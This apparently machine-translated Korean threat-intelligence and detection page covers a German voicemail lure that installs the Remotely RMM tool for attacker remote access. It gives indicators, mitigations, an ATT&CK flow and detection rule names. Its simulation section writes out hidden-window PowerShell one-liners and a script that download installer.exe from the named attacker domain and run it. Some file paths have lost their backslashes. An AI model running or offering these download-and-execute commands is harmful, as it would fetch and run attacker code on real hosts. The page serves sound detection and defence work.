음성사서함 덫: 독일어 음성사서함 유도가 원격 접근으로 연결됨
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
위협 행위자는 사용자가 BAT 파일을 다운로드하도록 유도하는 독일어 “음성 메일” 랜딩 페이지를 호스팅하고 있습니다. 이 스크립트는 benign한 오디오 미끼를 재생하며 조용히 합법적인 Remotely 원격 모니터링 도구를 설치합니다. 배포되면, RMM 에이전트는 공격자가 제어하는 C2 인프라를 통해 지속적인 원격 액세스를 공격자에게 제공합니다.
조사
Censys는 악성 BAT를 배포하는 *.cadillac.ps 도메인에서 86개의 손상된 웹 속성을 식별했습니다. 이 스크립트는 remotely.billbutterworth.com에 호스팅된 PowerShell 설치 프로그램을 호출하여 Remotely ZIP 패키지를 가져옵니다. 이 아카이브에는 Remotely 에이전트 구성 요소와 C:Program FilesRemotely에 설치되는 서비스가 포함되어 있습니다.
완화
DNS/프록시 계층에서 *.cadillac.ps 도메인과 remotely.billbutterworth.com을 차단하십시오. 사용자가 예상치 못한 BAT 파일을 실행하거나 알려지지 않은 웹 페이지에서 PowerShell 명령을 복사/붙여넣기 하지 않도록 교육하십시오. Remotely 서비스 생성 및 의심스러운 설치 경로 또는 서명되지 않은 도구를 탐지하기 위해 엔드포인트 통제를 배포하십시오.
대응
Program Files 아래에 Remotely_Service 생성 및 Remotely_Agent.exe 존재를 알립니다. voicemail.bat 및 연결된 PowerShell 설치 활동을 검색합니다. 영향을 받은 호스트를 격리하고, 포렌식 아티팩트를 수집하며, RMM 에이전트가 사용한 자격 증명이나 토큰을 회전/취소하십시오.
graph TB %% 클래스 정의 classDef action fill:#99ccff %% 노드 node_content_injection[“<b>기술</b> – T1659 콘텐츠 주입<br/>침해된 웹 자산이 악성 링크를 전달.”] class node_content_injection action node_initial_user_exec[“<b>기술</b> – T1204.001 사용자 실행: 악성 링크<br/>피해자가 침해된 음성사서함 랜딩 페이지로 연결되는 악성 링크를 클릭.”] class node_initial_user_exec action node_cmd_shell[“<b>기술</b> – T1059.003 Windows 명령 셸<br/>BAT 파일(voicemail.bat)이 다운로드 및 실행됨.”] class node_cmd_shell action node_powershell[“<b>기술</b> – T1059.001 PowerShell<br/>Install-Remotely.ps1 스크립트가 Remotely RMM을 설치.”] class node_powershell action node_system_service[“<b>기술</b> – T1569 시스템 서비스<br/>RMM이 Windows 서비스(Remotely_Service)로 설치됨.”] class node_system_service action node_masquerading[“<b>기술</b> – T1036 가장 & T1036.008 파일 유형 위장<br/>BAT가 미디어 업데이트로 표시되며 Program Files에 배치됨.”] class node_masquerading action node_hide_artifacts[“<b>기술</b> – T1564 아티팩트 숨김<br/>설치 아티팩트가 C:\Program Files\Remotely에 숨겨짐.”] class node_hide_artifacts action node_c2[“<b>기술</b> – T1102.002 웹 서비스 양방향 통신 & T1071 애플리케이션 계층 프로토콜<br/>원격 서버와의 HTTPS 통신.”] class node_c2 action %% 연결 node_content_injection –>|지원| node_initial_user_exec node_initial_user_exec –>|이어짐| node_cmd_shell node_cmd_shell –>|실행| node_powershell node_powershell –>|설치| node_system_service node_system_service –>|사용| node_masquerading node_system_service –>|사용| node_hide_artifacts node_system_service –>|설정| node_c2
공격 흐름
탐지
Powershell을 통해 다운로드 또는 업로드 (cmdline)
보기
의심스러운 랜섬웨어 간섭 서비스 중지 (cmdline)
보기
바이패스 실행 정책을 사용하여 의심스러운 디렉토리에서 파일을 실행하는 Powershell (cmdline)
보기
탐지할 수 있는 IoCs (HashSha256): 음성 메일 함정: 독일어 음성 메일 미끼가 원격 액세스로 이어짐
보기
탐지할 수 있는 IoCs (HashMd5): 음성 메일 함정: 독일어 음성 메일 미끼가 원격 액세스로 이어짐
보기
RMM 설치로 이어지는 독일어 음성 메일 미끼 [웹 서버]
보기
음성 메일 BAT 파일 실행 탐지 [Windows 파일 이벤트]
보기
시뮬레이션 실행
전제 조건: Telemetry & Baseline 프리플라이트 점검이 완료되어야 합니다.
이유: 이 섹션에서는 탐지 규칙을 촉발시키도록 설계된 적대적 기술 (TTP)의 정확한 실행 세부 사항을 설명합니다. 명령어 및 서술은 반드시 식별된 TTP를 직접 반영하고 탐지 로그에 의해 예상되는 정확한 텔레메트리를 생성하도록 해야 합니다. 추상적이거나 관련 없는 예시는 잘못된 결과로 이어질 것입니다.
-
공격 서사 및 명령어:
- 피싱 전달: 공격자는 피해자를 http://bannerbank.cadillac.ps/voicemail.html으로 리디렉션 하는 독일어 음성 메일 미끼 첨부 파일 (HTML)이 포함된 이메일을 보냅니다.
http://bannerbank.cadillac.ps/voicemail.html. - 랜딩 페이지 실행: 랜딩 페이지는 원격 관리 도구 (RMM) 설치 프로그램을 다운로드하고 실행하는 악성 PowerShell 원라이너를 호스팅합니다.
- 프로세스 생성: 피해자의 브라우저가 페이지를 처리할 때, PowerShell은 명령행으로 호출됩니다. 이 명령행은 규칙이 주의하는 두 문자열을 포함합니다. 명시적으로 이 두 개의 문자열을 포함합니다.
- 결과 텔레메트리: Windows 로그 이벤트 ID 4688에는
CommandLine명령어에 “음성 메일 테마의 랜딩 페이지” and “bannerbank.cadillac.ps”이 포함되어 Sigma 조건을 충족시킵니다.
시뮬레이션에 사용된 정확한 명령어:
# 시뮬레이션 된 악성 실행 – 두 개의 트리거 문자열 포함 Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - 피싱 전달: 공격자는 피해자를 http://bannerbank.cadillac.ps/voicemail.html으로 리디렉션 하는 독일어 음성 메일 미끼 첨부 파일 (HTML)이 포함된 이메일을 보냅니다.
-
회귀 테스트 스크립트: 요약 설명 시그마 탐지 규칙을 활성화하는 독일 음성 메일 미끼를 시뮬레이션 설명 명령어 라인에서 두 개의 필수 하위 문자열을 포함하여 PowerShell 명령어를 실행합니다. 악성 문자열 정의 $lureText = “음성 메일 랜딩 페이지” $maliciousDomain = “bannerbank.cadillac.ps” 명령행에 나타날 원라인 생성 $payload = “Write-Host ‘$lureText’; Invoke-WebRequest -Uri ‘http://$maliciousDomain/installer.exe’ -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe ” PowerShell을 생성된 명령어와 함께 실행 $psArgs = “-NoProfile -WindowStyle Hidden -Command “$payload”” Write-Host “악성 PowerShell 명령어 실행 중…” Start-Process -FilePath “powershell.exe” -ArgumentList $psArgs -PassThru 로깅 보장을 위하여 몇 초 동안 대기 Start-Sleep -Seconds 5
<# .SYNOPSIS Simulates the German voicemail lure that triggers the Sigma detection rule. .DESCRIPTION Executes a PowerShell command line containing both required substrings. #> # Define malicious strings $lureText = "voicemail-themed landing page" $maliciousDomain = "bannerbank.cadillac.ps" # Build the one‑liner that will appear in the command line $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Launch PowerShell with the crafted command line $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Launching malicious PowerShell command..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: wait a few seconds to ensure logging Start-Sleep -Seconds 5 -
정리 명령어: 다운로드된 설치 프로그램 및 잔여 프로세스를 제거합니다.
# 남아있는 설치 프로그램 프로세스 중지 Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # 임시 설치 파일 삭제 $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "정리 완료된 $installerPath" }